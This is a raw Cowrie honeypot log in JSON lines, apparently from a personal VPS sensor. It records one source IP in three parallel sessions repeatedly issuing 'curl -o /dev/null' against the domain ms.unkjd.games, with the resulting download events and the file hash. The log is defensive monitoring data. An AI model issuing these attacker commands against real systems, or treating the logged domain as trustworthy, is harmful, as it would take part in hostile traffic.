{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.240070Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.241670Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.242294Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.245938Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.248986Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.250832Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.251455Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.276897Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.277861Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.281007Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.281445Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.286533Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.287224Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.292780Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.318926Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.324161Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.325123Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.325837Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.329899Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.331743Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.332202Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.333197Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.333621Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.336885Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.368165Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.369439Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.370109Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.376427Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.377094Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.380273Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.382710Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.383581Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.435473Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.436206Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.438631Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.439551Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.441462Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.442432Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.446340Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.448695Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.452983Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.454393Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.456445Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.482555Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.484479Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.487910Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.490032Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.491500Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.492359Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.494503Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.495251Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.498474Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.499232Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.531261Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.532940Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.534240Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.534986Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.538726Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.539248Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.542383Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.543218Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.574066Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.576363Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.578107Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.578837Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.581512Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.582035Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.585367Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.586298Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.586948Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.591247Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.618438Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.620545Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.622406Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.622985Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.627884Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.628484Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.631985Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.632567Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
